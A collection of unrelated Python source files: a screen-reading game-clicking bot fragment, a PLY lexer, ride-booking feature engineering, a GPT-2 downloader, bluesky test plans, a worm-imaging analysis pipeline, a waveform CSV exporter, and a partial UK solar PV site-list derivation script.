classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
#print(np.squeeze(scores))
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=4)
sboxes = np.squeeze(boxes)
sscore = np.squeeze(scores)
sclasses = np.squeeze(classes)
minScore = 0.5
locations = []
for i in range(sboxes.shape[0]):
if scores is None or sscore[i] > minScore:
#class_name = category_index[classes[0]]['name']
#print(six.viewkeys(category_index))
if sclasses[i] in six.viewkeys(category_index):
box_class_name = category_index[sclasses[i]]['name']
box = tuple(sboxes[i].tolist())
boxx = spot(box[0], box[1], box[2], box[3], box_class_name)
locations.append(boxx)
#for i in locations:
# print("xmin: ", i.xmin, " xmax: ", i.xmax, " ymin: ", i.ymin," ymax: ", i.ymax,)
if harvestStatus and (currentPos[0] > 0 and currentPos[0] < monSize[0]):
currentMillis = time.time() * 1000
if((currentMillis - prevMillis) >= timeDelta):
prevMillis = currentMillis
if len(locations) > 0:
for location in locations:
if harvestConfig[location.class_name] == True:
if dropInvent == True:
dropFirstItem()
estNumHarvested += 1
#print(location.class_name)
xcord = location.centerX
ycord = location.centerY
xmin = location.xmin
ymin = location.ymin
xmax = location.xmax
ymax = location.ymax
#pyautogui.click(xcord, ycord, duration = np.random.uniform(0.2, 0.6))
pyautogui.moveTo(xcord, ycord, duration = np.random.uniform(0.1, 0.4))
pyautogui.click()
break
#pyautogui.moveTo(xmin, ymin, duration = 0)q
#pyautogui.moveTo(xmax, ymin, duration = 1)
#pyautogui.moveTo(xmax, ymax, duration = 1)
#pyautogui.moveTo(xmin, ymax, duration = 1)
#pyautogui.moveTo(xmin, ymin, duration = 1)
#print("xmin: ", xmin, " xmax: ", xmax, " ymin: ", ymin," ymax: ", ymax)
#print("click at: center x: ", xcord, " center y: ", ycord)
cv2.imshow('screen', cv2.resize(np.array(image_np), (int(mon2width/2), int(mon2height/2))))
if cv2.waitKey(25) & 0xFF == ord('p'):
print("p pressed")
if runAgent == True:
runAgent = False
elif runAgent == False:
runAgent = True
if cv2.waitKey(25) & 0xFF == ord('h'):
homeTeleport()
if cv2.waitKey(25) & 0xFF == ord('t'):
dropFirstItem()
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
window.close() |
the-stack_106_30648 | # coding: utf-8
"""
@Topic:
@Date: 2021/1/29
@Author: other.z
@Copyright(C): 2020-2023 other.z Inc. All rights reserved.
"""
import json
import ply.lex
class LexerError(Exception):
pass
class Lexer:
def tokenize(self, string, debug=False):
"""
Maps a string to an iterator over tokens. In other words: [char] -> [token]
:param string:
:param debug:
:return:
"""
new_lexer = ply.lex.lex(module=self, debug=debug)
new_lexer.latest_newline = 0
new_lexer.string_value = None
new_lexer.input(string)
while True:
t = new_lexer.token()
if t is None: break
t.col = t.lexpos - new_lexer.latest_newline
yield t
if new_lexer.string_value is not None:
raise LexerError('Unexpected EOF in string literal or identifier')
literals = '#@$&{.[](=,)}'
reserved_words = {'V': 'VARIABLE', 'P': 'PARAMETER'}
tokens = [
'ID',
'NUMBER',
'STRING'
] + list(reserved_words.values())
t_ignore = ' \t'
def t_ID(self, t):
r"""[a-zA-Z_][a-zA-Z0-9_]*"""
t.type = self.reserved_words.get(t.value, 'ID')
return t
def t_NUMBER(self, t):
r"""-?\d+"""
t.value = int(t.value)
return t
def t_STRING(self, t):
r"""\"([^\\\n]|(\\.))*?\""""
t.value = json.loads(t.value)
return t
# Counting lines, handling errors
def t_newline(self, t):
r"""\n"""
t.lexer.lineno += 1
t.lexer.latest_newline = t.lexpos
def t_error(self, t):
raise LexerError('Error on line %s, col %s: Unexpected character: %s ' % (
t.lexer.lineno, t.lexpos - t.lexer.latest_newline, t.value[0]))
if __name__ == '__main__':
def main():
data = '''22.035fads@!$$$'''
# data = '"9fdsafd*.\ssd/${aaa}"'
lexer = Lexer()
for token in lexer.tokenize(data):
print(token)
main() |
the-stack_106_30649 | import logging
import click
from pathlib import Path
import pandas as pd
import numpy as np
import geopy.distance
import datetime
import pytz
from src.filename import BOOKING_PREPROCESSED, PARTICIPANT_PREPROCESSED, TEST_PREPROCESSED, TRAIN_TRANSFORMED, TRAIN, TEST
def cal_dist(row):
lat_x, long_x, lat_y, long_y = row['pickup_latitude'], row['pickup_longitude'], row['driver_latitude'], row['driver_longitude']
coord_x = (lat_x, long_x)
coord_y = (lat_y, long_y)
return geopy.distance.distance(coord_x, coord_y).km
def is_peak(row):
local_tz = pytz.timezone('Asia/Jakarta')
utc_ts = row['event_timestamp']
try:
utc_ts = datetime.datetime.strptime(utc_ts, '%Y-%m-%d %H:%M:%S+00:00')
except:
utc_ts = datetime.datetime.strptime(utc_ts, '%Y-%m-%d %H:%M:%S.%f000+00:00')
local_dt = utc_ts.replace(tzinfo=pytz.utc).astimezone(local_tz)
day = local_dt.isoweekday()
time = local_dt.time()
if 1 <= day <= 4:
if ((time >= datetime.time(7, 0)) and (time <= datetime.time(10, 0))) | ((time >= datetime.time(17, 0)) and (time <= datetime.time(20, 0))):
return 1
else:
return 0
else:
if ((time >= datetime.time(8, 0)) and (time <= datetime.time(10, 0))) | ((time >= datetime.time(17, 0)) and (time <= datetime.time(23, 59))):
return 1
else:
return 0
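# Worked example for is_peak (hypothetical row): an event_timestamp of
# '2021-01-04 01:30:00+00:00' is 08:30 on a Monday in Asia/Jakarta (UTC+7),
# which falls inside the 07:00-10:00 weekday window above, so is_peak returns 1.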
def train_transform(input_filepath, output_filepath):
booking = pd.read_csv(input_filepath + '/%s' % BOOKING_PREPROCESSED)
driver = pd.read_csv(input_filepath + '/%s' % PARTICIPANT_PREPROCESSED)
# create base dataset, each row represents one booking allocation
# output indicates whether the allocation trip is completed
# having the same columns as test, except output (to be predicted for test data)
created_booking_cols = ['event_timestamp', 'order_id','trip_distance', 'pickup_latitude', 'pickup_longitude']
created = booking[booking.booking_status =='CREATED'][created_booking_cols]
completed_booking_cols = ['order_id', 'driver_id']
completed = booking[booking.booking_status == 'COMPLETED'][completed_booking_cols]
booking_base = pd.merge(created, completed, on=['order_id'], how='left').rename(columns={'driver_id':'booking_driver_id'})
driver_cols = ['order_id', 'driver_id', 'driver_latitude', 'driver_longitude', 'driver_gps_accuracy']
driver_base = driver[driver_cols]
train_transformed = pd.merge(driver_base, booking_base, on=['order_id'], how='left')
train_transformed['output'] = np.where(train_transformed['driver_id'] == train_transformed['booking_driver_id'], 1, 0)
train_transformed = train_transformed.drop(columns = "booking_driver_id")
train_transformed.to_csv(output_filepath + '/%s' % TRAIN_TRANSFORMED, index=False)
def create_feature(df, failed, completed):
df = pd.merge(df, failed, on ='driver_id', how='left').fillna(0)
df = pd.merge(df, completed, on ='driver_id', how='left').fillna(0)
# distance between pickup and driver location
df['pickup_distance'] = df.apply(cal_dist, axis=1)
    # check if the booking CREATED timestamp is in a peak hour
# defined by gojek official website, considering Jarkata timezone
df['is_peak'] = df.apply(is_peak, axis=1)
return df
def feature_eng(input_filepath, output_filepath):
# create new features
train = pd.read_csv(output_filepath + '/%s' % TRAIN_TRANSFORMED)
test = pd.read_csv(input_filepath + '/%s' % TEST_PREPROCESSED)
# number of times a driver is allocated but failed to complete trip (regardless failure reason)
train['failed'] = np.where(train['output'] == 1, 0, 1)
failed = train.groupby(['driver_id'], as_index=False)['failed'].sum().rename(columns={'failed': 'total_failed'})
# number of times a driver completes trip
train['completed'] = np.where(train['output'] == 1, 1, 0)
completed = train.groupby(['driver_id'], as_index=False)['completed'].sum().rename(columns={'completed': 'total_completed'})
train = create_feature(train, failed, completed)
test = create_feature(test, failed, completed)
train.to_csv(output_filepath + '/%s' % TRAIN, index=False)
test.to_csv(output_filepath + '/%s' % TEST, index=False)
logger = logging.getLogger(__name__)
logger.info('making processed data set from interim data')
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
def main(input_filepath, output_filepath):
train_transform(input_filepath, output_filepath)
feature_eng(input_filepath, output_filepath)
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
|
the-stack_106_30651 | import os
import sys
import requests
from tqdm import tqdm
if len(sys.argv) != 2:
print('You must enter the model name as a parameter, e.g.: download_model.py 124M')
sys.exit(1)
model = sys.argv[1]
subdir = os.path.join('models', model)
if not os.path.exists(subdir):
os.makedirs(subdir)
subdir = subdir.replace('\\','/') # needed for Windows
for filename in ['checkpoint','encoder.json','hparams.json','model.ckpt.data-00000-of-00001', 'model.ckpt.index', 'model.ckpt.meta', 'vocab.bpe']:
r = requests.get("https://openaipublic.blob.core.windows.net/gpt-2/" + subdir + "/" + filename, stream=True)
with open(os.path.join("src",subdir, filename), 'wb') as f:
file_size = int(r.headers["content-length"])
chunk_size = 1000
with tqdm(ncols=100, desc="Fetching " + filename, total=file_size, unit_scale=True) as pbar:
# 1k for chunk_size, since Ethernet packet size is around 1500 bytes
for chunk in r.iter_content(chunk_size=chunk_size):
f.write(chunk)
pbar.update(chunk_size)
|
the-stack_106_30652 | # Contain plan headers for testing of queue execution for BMM beamline
# Plans: mv, xafs, change_edge, shb_close_plan, set_slot
from ophyd.sim import hw
from bluesky.plans import count, scan
from bluesky.plan_stubs import mv # noqa: F401
from bluesky_queueserver.manager.profile_tools import set_user_ns
det1, det2, motor = hw().det1, hw().det2, hw().motor
# Those are devices used with 'mv' plans
xafs_x = motor
xafs_y = motor
slits3_hsize = motor
xafs_det = motor
@set_user_ns
def xafs(inifile=None, *, user_ns, **kwargs):
yield from count([det1, det2], num=5, delay=1)
@set_user_ns
def change_edge(
el, focus=False, edge="K", energy=None, slits=True, target=300.0, xrd=False, bender=True, *, user_ns
):
yield from scan([det1, det2], motor, -1, 1, 10)
def shb_close_plan():
yield from count([det1, det2])
def slot(n):
yield from count([det1])
|
the-stack_106_30654 | import sys
import yaml
import argparse
import re
import pandas as pd
import subprocess
import shlex
from pathlib import Path
from collections import defaultdict
from collections import namedtuple
sys.path.append(str(Path.home().joinpath('wrmXpress/modules')))
from get_wells import get_wells
from get_image_paths import get_image_paths
from convert_video import convert_video
from dense_flow import dense_flow
from segment_worms import segment_worms
from generate_thumbnails import generate_thumbnails
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# required positional arguments
parser.add_argument('parameters',
help='Path to the paramaters.yml file.')
parser.add_argument('plate',
help='Plate to be analyzed.')
args = parser.parse_args()
######################################
######### GET PARAMETERS #########
######################################
# read the parameters from the YAML
with open(args.parameters, 'rb') as f:
        # FullLoader parses booleans and numbers natively (BaseLoader would read everything as strings)
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
# read the modules, remove any where run is False
species = conf.get('species')[0]
stages = conf.get('stages')[0]
modules = conf.get('modules')
print('modules:')
for key, value in modules.copy().items():
if value['run'] is False:
print("\t\t{}: {}".format(key, value['run']))
del modules[key]
else:
print("\t\t{}: {}".format(key, value['run']))
if 'cellprofiler' in modules.keys():
for py_mod in ['segment', 'motility', 'convert']:
if py_mod in modules.keys():
raise ValueError(
"'{}' cannot be used with 'cellprofiler'".format(py_mod))
# save the parameters in variables
wells = conf.get('wells') # list of wells or 'all'
work = conf.get('directories').get('work')[0] # string
input = conf.get('directories').get('input')[0] # string
output = conf.get('directories').get('output')[0] # string
# plate = conf.get('directories').get('plate')[0] # string
plate = args.plate
plate_short = re.sub('_[0-9]*$', '', plate) # string
# define directories
input = Path.home().joinpath(input)
work = Path.home().joinpath(work)
output = Path.home().joinpath(output)
plate_dir = Path.home().joinpath(input, plate)
# HTD
with open(plate_dir.joinpath(plate_short + '.HTD'), encoding='utf-8', errors='ignore') as f:
lines = f.readlines()
time_points = int(
next((s for s in lines if 'TimePoints' in s), None).split(', ')[1])
columns = int(
next((s for s in lines if 'XWells' in s), None).split(', ')[1])
rows = int(
next((s for s in lines if 'YWells' in s), None).split(', ')[1])
x_sites = int(
next((s for s in lines if 'XSites' in s), None).split(', ')[1])
y_sites = int(
next((s for s in lines if 'YSites' in s), None).split(', ')[1])
n_waves = int(
next((s for s in lines if 'NWavelengths' in s), None).split(', ')[1])
# loop to get all the WaveNames
wave_names = []
for i in range(n_waves):
name = 'WaveName' + str(i + 1)
wave_name = next((s for s in lines if name in s),
None).split(', ')[1]
wave_names.append(wave_name.rstrip().replace('"', ''))
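    # The .HTD file is a plain-text plate description; the lines parsed above are
    # '"Key", value' pairs split on ', ', roughly like this sketch (hypothetical values):
    #   "TimePoints", 1
    #   "XWells", 12
    #   "YWells", 8
    #   "XSites", 2
    #   "YSites", 2
    #   "NWavelengths", 2
    #   "WaveName1", "w1"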
# pool global variables into namedtuple (g)
g = namedtuple(
'g', 'input work output plate_dir plate plate_short species stages time_points columns rows x_sites y_sites n_waves wave_names wells plate_paths')
g = g(input, work, output, plate_dir, plate, plate_short, species, stages, time_points,
columns, rows, x_sites, y_sites, n_waves, wave_names, wells, '')
######################################
######### GET WELLS & PATHS #########
######################################
# get the wells and well paths
try:
if 'All' in wells:
wells = get_wells(g)
plate_paths = get_image_paths(g, wells)
else:
plate_paths = get_image_paths(g, wells)
except TypeError:
print("ERROR: YAML parameter \"wells\" improperly formated (or none provided) or failure to retrieve image paths.")
# update g with wells & plate_paths and print contents (except for plate_paths)
g = g._replace(wells=wells, plate_paths=plate_paths)
for (i, j) in zip(g._fields[:-1], g[:-1]):
print("{}:\t{}".format(i, j))
##########################################
######### RUN CELLPROFILER #########
##########################################
if 'cellprofiler' in modules.keys():
pipeline = modules['cellprofiler']['pipeline'][0]
fl_command = 'Rscript wrmXpress/scripts/cp/generate_filelist_{}.R {} {}'.format(
pipeline, g.plate, g.wells)
fl_command_split = shlex.split(fl_command)
print('Generating file list for CellProfiler.')
subprocess.run(fl_command_split)
cp_command = 'cellprofiler -c -r -p wrmXpress/cp_pipelines/pipelines/{}.cppipe --data-file=input/image_paths_{}.csv'.format(
pipeline, pipeline)
cp_command_split = shlex.split(cp_command)
print('Starting CellProfiler.')
subprocess.run(cp_command_split)
md_command = 'Rscript wrmXpress/scripts/metadata_join_master.R {}'.format(
g.plate)
md_command_split = shlex.split(md_command)
print('Joining experiment metadata and tidying.')
subprocess.run(md_command_split)
######################################
######### RUN PY MODULES #########
######################################
# Each module will give a single phenotypic value, which is then written
# out to a CSV. out_dict is a dictionary of well: [phenotype1, phenotype2, etc.]
# that will later be converted to a DataFrame and written to a csv.
# cols includes all the column names that will be in the output
# DataFrame. When the modules are run below, they need to append the column
# name to cols and the phenotypic value to out_dict['well'].
if 'cellprofiler' not in modules.keys():
out_dict = defaultdict(list)
cols = []
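        # Shape sketch (hypothetical values): after running 'segment' and 'motility' on two wells,
        #   cols     == ['worm_area', 'optical_flow']
        #   out_dict == {'A01': [1234.5, 67.8], 'A02': [982.1, 54.3]}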
# start the well-by-well iterator
for well, well_paths in zip(wells, plate_paths):
print("Running well {}".format(well))
if 'convert' in modules.keys():
# get the value of reorganize and pass it to the module
reorganize = modules.get('convert').get('save_video')
multiplier = float(modules.get(
'convert').get('rescale_multiplier'))
video = convert_video(g, well, well_paths, reorganize, multiplier)
print('{}: module \'convert\' finished'.format(well))
if 'segment' in modules.keys():
if n_waves != 1:
wave_length = modules.get('segment').get('wavelength')
# filter for the paths to the wavelengths to be segmented
well_paths = [
path for path in well_paths if wave_length in str(path)]
worm_area = segment_worms(g, well, well_paths)
if 'worm_area' not in cols:
cols.append('worm_area')
out_dict[well].append(worm_area)
print('{}: module \'segment\' finished'.format(well))
if 'motility' in modules.keys():
# don't use a rescaled video for flow
video = convert_video(g, well, well_paths, False, 1)
flow = dense_flow(g, well, video)
if 'optical_flow' not in cols:
cols.append('optical_flow')
out_dict[well].append(flow)
print('{}: module \'motility\' finished'.format(well))
###############################################
######### WRITE DATA #########
###############################################
df = pd.DataFrame.from_dict(out_dict, orient='index', columns=cols)
output.joinpath('data').mkdir(parents=True, exist_ok=True)
outpath = output.joinpath('data', plate + '_data' + ".csv")
df.to_csv(path_or_buf=outpath, index_label='well')
md_command = 'Rscript wrmXpress/scripts/metadata_join_master.R {}'.format(g.plate)
md_command_split = shlex.split(md_command)
subprocess.run(md_command_split)
###############################################
######### GENERATE THUMBNAILS #########
###############################################
if 'dx' in modules.keys():
# one for each wavelength (TimePoint1)
if n_waves == 1:
type = ''
print("Generating w1 thumbnails")
generate_thumbnails(g, type)
else:
for i in range(1, n_waves + 1):
type = 'w' + str(i)
print("Generating {} thumbnails".format(type))
generate_thumbnails(g, type)
# one for each specific module
dx_types = []
if 'segment' in modules:
dx_types.append('binary')
if 'motility' in modules:
dx_types.append('motility')
for type in dx_types:
print("Generating {} thumbnails".format(type))
generate_thumbnails(g, type)
|
the-stack_106_30655 | from time import perf_counter as tpc
import nevergrad as ng
from opt import Opt
class OptNB(Opt):
"""Minimizer based on the NoisyBandit method from "nevergrad" package."""
name = 'NB'
def prep(self, evals=1.E+7):
self.evals = int(evals)
return self
def solve(self):
t = tpc()
par = ng.p.Array(shape=(self.d,), lower=self.a, upper=self.b)
opt = ng.optimizers.registry['NoisyBandit'](budget=self.evals,
parametrization=par, num_workers=1)
self.x = opt.minimize(self.f0).value
self.y = self.f0(self.x)
self.t = tpc() - t
def to_dict(self):
res = super().to_dict()
res['evals'] = self.evals
return res
|
the-stack_106_30658 | """
Classes to handle scopeout's interactions with the filesystem,
particularly data export/import.
"""
import logging
import os
from csv import *
from datetime import datetime
from collections import Iterable
from scopeout.models import Waveform
FILE_HEADER = 'Waveforms generated by ScopeOut Data Acquisition Tool. \nFile Generated {}\n\n'
class WaveformCsvFile:
"""
Handle reading/writing a waveform or list of waveforms to a .csv file.
"""
def __init__(self, waveform, path):
"""
Constructor.
:param waveform: a single waveform or list of waveforms.
:param path: an absolute path to the .csv file, whether it exists yet or not.
"""
self.writer = None
self.reader = None
self.file = None
self.path = path
self.logger = logging.getLogger('ScopeOut.filesystem.WaveformCsvFile')
try:
assert isinstance(waveform, (Waveform, Iterable))
self.waveform = waveform
except AssertionError:
self.logger.error('WaveformCsvFile must be instantiated with a waveform or iterable of waveforms.')
except Exception as e:
self.logger.error(e)
def __enter__(self):
if os.path.exists(self.path):
self.file = open(self.path, newline='')
self.reader = reader(self.file)
else:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.file.close()
@staticmethod
def _write_header(file):
"""
Write the standard data header to a file.
        :param file: the output file, opened for writing.
"""
file.write(FILE_HEADER.format(datetime.utcnow()))
@staticmethod
def _write_footer(file):
"""
Write the standard data footer to a file.
:param file: the output file, opened for writing.
"""
pass
def _write_wave(self, wave):
"""
        Write all of a wave's information to the output file via self.writer.
        :param wave: a Waveform.
"""
assert isinstance(wave, Waveform)
wave_dict = sorted(wave.__dict__.items())
for key, value in wave_dict:
if not isinstance(value, list) and not key.startswith('_'):
self.writer.writerow([key, value])
self.writer.writerow([''])
self.writer.writerow(['X', 'Y'])
for i in range(0, len(wave.x_list)):
try:
self.writer.writerow([str(wave.x_list[i]), str(wave.y_list[i])])
except IndexError:
self.logger.error('X and Y data incompatible.')
self.writer.writerow([''])
def write(self):
"""
        Dump the entire contents of the wrapped waveform(s) to disk.
"""
if not self.file:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
WaveformCsvFile._write_header(self.file)
if isinstance(self.waveform, Iterable):
for wave in self.waveform:
self._write_wave(wave)
elif isinstance(self.waveform, Waveform):
self._write_wave(self.waveform)
WaveformCsvFile._write_footer(self.file)
def write_properties(self, properties=[]):
"""
Write the specified properties of the wrapped waveform(s) to disk.
:param properties: an iterable of wave property names.
"""
if not self.file:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
if not properties:
if isinstance(self.waveform, Iterable):
properties = [key for key, value in self.waveform[0].__dict__.items()
if not key.startswith('_') and not isinstance(value, list)]
else:
properties = [key for key, value in self.waveform.__dict__.items()
if not key.startswith('_') and not isinstance(value, list)]
WaveformCsvFile._write_header(self.file)
self.writer.writerow(properties)
if isinstance(self.waveform, Iterable):
for wave in self.waveform:
self.writer.writerow([getattr(wave, property) for property in properties])
else:
self.writer.writerow([getattr(self.waveform, property) for property in properties])
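# Minimal usage sketch (hypothetical Waveform instance and output path); the class is a
# context manager, and write()/write_properties() also open the file themselves if needed:
#   with WaveformCsvFile(wave, '/tmp/wave.csv') as csv_file:
#       csv_file.write()  # full x/y data plus scalar properties
#       # or: csv_file.write_properties(['capture_time'])  # property name is hypothetical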
|
the-stack_106_30659 | """
A script to derive a national PV site list.
- First Authored 2018-11-22
- Owen Huxley <[email protected]
"""
import pandas as pd
import numpy as np
import time as TIME
from datetime import datetime
import picklecache
import os
import re
import io
import codecs
import pickle
import sys
from configparser import ConfigParser
def main():
SLDerivation = SiteListDerivation()
def cached(cachefile):
"""
A function that creates a decorator which will use "cachefile" for caching the results of the decorated function "fn".
"""
def decorator(fn): # define a decorator for a function "fn"
def wrapped(*args, **kwargs): # define a wrapper that will finally call "fn" with all arguments
# if cache exists -> load it and return its content
if os.path.exists(cachefile):
with open(cachefile, 'rb') as cachehandle:
print("using cached result from '%s'" % cachefile)
return pickle.load(cachehandle)
# execute the function with all arguments passed
res = fn(*args, **kwargs)
# write to cache file
with open(cachefile, 'wb') as cachehandle:
print("saving result to cache '%s'" % cachefile)
pickle.dump(res, cachehandle)
return res
return wrapped
return decorator # return this "customized" decorator that uses "cachefile"
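# Minimal usage sketch of the @cached decorator (hypothetical function and cache path):
#   @cached("../data/site_list/expensive_result.pickle")
#   def expensive_computation():
#       ...  # body runs once; later calls just unpickle the saved result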
class SiteListDerivation:
"""A class to derive the national PV sitelist from the raw data files."""
def __init__(self, options=None):
self.quiet = False
self.FIT_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/FIT/feed_in_tariff_installation_report_-_30_sept_2018_complete.csv"
self.RO_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/RO/RO - AccreditedStationsExternalPublic.csv"
self.REPD_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/REPD/repd-database-sep-2018.csv"
self.SM_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/SM/SM_report_4_20181122.csv"
self.EL_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/EL/Solar_Sheffield_Site_Data.csv"
self.config_file = "Config/PV_site_list_derivation.ini"
self.config = self.load_config(self.config_file)
self.data = None
self.run()
def run(self):
"""The main function that executes all the class methods."""
# loading FIT
# ========================================================================
self.myprint("Loading the FIT data and sorting by installed capacity....",
time_section="start")
FIT_data = self.load_FIT()
self.myprint(" --> Finished.", time_section="stop")
# loading REPD
# =========================================================================
self.myprint("Loading the REPD data and sorting by installed capacity....",
time_section="start")
REPD_data = self.load_REPD()
self.myprint(" --> Finished.", time_section="stop")
# loading SM
# =========================================================================
self.myprint("Loading the SM data and sorting by installed capacity....",
time_section="start")
SM_data = self.load_SM()
self.myprint(" --> Finished.", time_section="stop")
# loading EL
# =========================================================================
self.myprint("Loading the EL data and sorting by installed capacity....",
time_section="start")
EL_data = self.load_EL()
self.myprint(" --> Finished.", time_section="stop")
# loading RO
# =========================================================================
self.myprint("Loading the RO data and sorting by installed capacity....",
time_section="start")
RO_data = self.load_RO()
self.myprint(" --> Finished.", time_section="stop")
self.data = {"FIT_data" : FIT_data, "REPD_data" : REPD_data, "SM_data" : SM_data,
"EL_data" : EL_data, "RO_data" : RO_data}
# ========================================================================
self.derivation()
# import pdb; pdb.set_trace()
def derivation(self, sm_cut_off=5):
"""
        Derive the national site list by combining the loaded data sources.
        Parameters
        ----------
        `sm_cut_off` : float
            The cut-off in MW used to select non-FIT data from Solar Media
            when deriving the site-list.
"""
repd_geq_cutoff = self.data["REPD_data"].loc[self.data["REPD_data"]["Capacity"]
>= sm_cut_off].copy()
        # Parentheses are needed around the comparison: '&' binds tighter than '<' in Python.
        sm_leq_cutoff = self.data["SM_data"].loc[(self.data["SM_data"]["Capacity"] < sm_cut_off)
                                                 & ~self.data["SM_data"]["Funding"].isin(["FIT"])].copy()
fit_leq_5 = self.data["FIT_data"].loc[self.data["FIT_data"]["Capacity"]
< sm_cut_off].copy()
frames = (repd_geq_cutoff, sm_leq_cutoff, fit_leq_5)
site_list = pd.concat(frames)
# import pdb; pdb.set_trace()
@staticmethod
def load_config(file=""):
"""
A function to load the config file.
Parameters
----------
`file` : str
The path of the config file.
Returns
-------
`config` : dict
A dictionary containing the config parameters.
"""
try:
parser = ConfigParser()
config = {}
parser.read(file)
config["config_location"] = file
config["mysql_options_readwrite_capacity_analysis"] = parser\
.get("mysql_files",
"mysql_options_ssfdb2_readwrite_capacity_analysis")
config["error_logfile"] = parser.get("other", "error_logfile")
config["soalarsite_table"] = parser.get("mysql_tables", "solarsite_table")
return config
except:
print("Error loading config, please check that config file exists and lists all of the"
" required values.")
raise
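    # Sketch of a matching Config/PV_site_list_derivation.ini (values are placeholders):
    #   [mysql_files]
    #   mysql_options_ssfdb2_readwrite_capacity_analysis = /path/to/mysql_readwrite.cnf
    #   [other]
    #   error_logfile = /path/to/error.log
    #   [mysql_tables]
    #   solarsite_table = solarsite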
@cached("../data/site_list/fit_datframe.pickle")
def load_FIT(self):
with open(self.FIT_file, 'r') as fid:
data = []
fit_not_pv = 0
next(fid)
i = 1
j = 0
print_progress(j, 900000)
for line in fid:
i += 1
# line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
# if len(row) == 1:
# continue
if len(row) != 19:
raise Exception("Parsed the wrong number of columns on line {} of the EL file "
"('{}').".format(i, self.FIT_file))
elif row[2] == "Photovoltaic":
j += 1
if 100000 % j:
print_progress(j, 900000)
# postcode = row[1] # if row[1]!="" else np.nan
capacity = float(row[3]) / 1000. if self.isNumber(row[3]) else np.nan
declared_net_capacity = float(row[4]) / 1000. if self.isNumber(row[4]) else np.nan
commission_date = datetime.strptime(row[6], "%d-%m-%Y %H:%M:%S").date() if row[6] != "" else np.nan
# lat
# lon
this_data = [row[0], row[1], capacity, declared_net_capacity, commission_date, row[8]]
# if this_data not in data:
data.append(this_data)
else:
fit_not_pv += 1
print_progress(900000, 900000)
df = pd.DataFrame(np.array(data), columns=["Extension", "Postcode", "Capacity", "DN Capacity", "Install Date", "Export Status"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "FIT"
return df
def load_REPD(self):
"""
Loads REPD csv file
"""
# ID, capacity, postcode, install_date
with io.open(self.REPD_file, "rt", newline="") as fid:
data = []
next(fid)
content = fid.read()
content = re.sub(r'"[^"]*"', lambda m: m.group(0).replace("\r", " ").replace("\n", " "),
content)
i = 1
for line in content.split("\r\n"):
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 45:
raise Exception("Parsed the wrong number of columns on line {} of the REPD file "
"('{}').".format(i, filename))
test = (row[5] == "Solar Photovoltaics") and (row[15] == "Operational")
if test:
instal_date = datetime.strptime(row[44], "%Y-%m-%d").date() if row[44] != "" else np.nan
capacity = float(row[6]) if self.isNumber(row[6]) else np.nan
fit = self.isNumber(row[9])
data.append([row[1], capacity, row[21], row[22], row[23], instal_date])
else:
continue
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Eastings",
"Northings", "Install Date"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "REPD"
return df
def load_RO(self):
"""
Loads RO csv file
"""
# ID, capacity, postcode, install_date
data = []
with io.open(self.RO_file, "rt", newline="\r\n") as fid:
next(fid)
i = 1
for line in fid:
i += 1
# import pdb; pdb.set_trace()
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 14:
raise Exception("Parsed the wrong number of columns on line {} of the RO file "
"('{}').".format(i, self.RO_file))
postcode = re.findall("[A-Z][A-Z]?[0-9][0-9]? *[0-9][A-Z][A-Z]", row[-1])
postcode = postcode[0] if len(postcode) > 0 else ""
install_date = datetime.strptime(row[9], "%d/%m/%Y").date() if row[9] != "" else np.nan
capacity = float(row[4]) / 1000. if self.isNumber(row[4]) else np.nan
data.append([row[0], capacity, postcode, install_date])
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Install Date"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "RO"
return df
def load_SM(self):
"""
Loads solar media csv file
Notes
-----
The Solar Media file should be saved as a csv
with only the following columns:
Solar Media Ref #, Site Name, Final Capacity MWp-dc, Postal Address, Postcode, Postal Town,
County, District, Region, Country, Eastings, Northings, Day-Month-Year, Completion Month,
Completion Quarter, Completion Calendar Year, Original Funding Route, Final Funding Route.
        Be careful when data is deleted using Excel. The column must be right-clicked and deleted,
        otherwise Excel will leave empty strings in place of deleted data.
ID, capacity, postcode, install_date
"""
data = []
with io.open(self.SM_file, "rt", newline="") as fid:
# skipping header line
next(fid)
# reading file as one long string
content = fid.read()
i = 1
for line in content.split("\r\n"):
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 18:
